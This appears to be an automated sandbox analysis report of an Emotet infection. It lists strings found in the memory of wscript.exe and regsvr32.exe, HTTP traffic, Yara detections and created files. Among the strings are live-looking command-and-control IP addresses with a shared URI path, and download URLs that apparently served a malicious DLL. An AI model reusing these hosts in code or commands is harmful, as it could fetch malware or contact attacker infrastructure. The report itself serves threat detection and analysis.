Source: regsvr32.exe, 00000004.00000003.631557827.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632847163.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.142.56:8080/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633400839.0000000002CEE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631327134.0000000002CEE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/Low
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/~
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://163.44.196.120:8080/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://163.44.196.120:8080/a
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://163.44.196.120:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://164.90.222.65/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://164.90.222.65:443/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://167.172.199.165:8080/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://167.172.199.165:8080/&C
Source: regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://167.172.199.165:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://91.121.146.47:8080/
Source: regsvr32.exe, 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/D
Source: wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreem
Source: wscript.exe, 00000001.00000003.402475133.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400788663.000000000579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407340344.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400134477.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410176133.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400415831.0000000005797000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400837362.00000000057AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
Source: wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404821142.0000000005952000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404992491.0000000005963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404790346.0000000005948000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllG
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
Source: wscript.exe, 00000001.00000003.406246546.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410615490.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407565832.0000000005A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/
Source: wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406246546.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401168303.000000000583C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396577821.00000000054FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407228406.00000000058EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.00000000055A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405042674.0000000005982000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396577821.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398739448.000000000565D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410425286.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396205174.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399332103.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.000000000555C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403345800.0000000005872000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408199396.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398390395.0000000005657000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400913529.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404790346.0000000005948000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/:
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410244672.0000000005935000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407529090.0000000005935000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/o8
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
Source: wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/l
Source: wscript.exe, 00000001.00000003.402475133.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400788663.000000000579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407340344.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400134477.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410176133.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400415831.0000000005797000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400837362.00000000057AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/script.createobject(
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
Source: wscript.exe, 00000001.00000003.404701229.0000000005980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/LE=C:
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gomespontes.com.br/logs/pd/
Source: wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gomespontes.com.br/logs/pd/RPROFII
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gomespontes.com.br/logs/pd/RPROFIN
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
Source: unknown HTTP traffic detected: POST /jesecsgigcdk/zfgrij/wjhswvhm/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
Source: unknown DNS traffic detected: queries for: penshorn.org
Source: global traffic HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
Source: unknown HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 4.2.regsvr32.exe.2470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.2470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.633268738.00000000024A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.633113023.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.394237603.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara signature match
Source: 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Creates files inside the system directory
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\CRCPqQPgWxqcgJu\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006818 3_2_0000000180006818
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B878 3_2_000000018000B878
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180007110 3_2_0000000180007110
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008D28 3_2_0000000180008D28
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014555 3_2_0000000180014555
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_006F0000 3_2_006F0000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073CC14 3_2_0073CC14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074A000 3_2_0074A000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074709C 3_2_0074709C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00737D6C 3_2_00737D6C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073263C 3_2_0073263C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00738BC8 3_2_00738BC8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00748FC8 3_2_00748FC8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00746C70 3_2_00746C70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073D474 3_2_0073D474
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00732C78 3_2_00732C78
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073C078 3_2_0073C078
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073B07C 3_2_0073B07C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074B460 3_2_0074B460
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00755450 3_2_00755450
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074C058 3_2_0074C058
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00737840 3_2_00737840
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074C44C 3_2_0074C44C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00741030 3_2_00741030
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0074EC30 3_2_0074EC30
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073B83C 3_2_0073B83C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0075181C 3_2_0075181C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00731000 3_2_00731000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00739408 3_2_00739408
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00737C08 3_2_00737C08
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00733CF4 3_2_00733CF4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007390F8 3_2_007390F8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007348FC 3_2_007348FC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007420E0 3_2_007420E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00743CD4 3_2_00743CD4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007314D4 3_2_007314D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007318DC 3_2_007318DC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00745CC4 3_2_00745CC4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0073F8C4 3_2_0073F8C4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_007408CC 3_2_007408CC
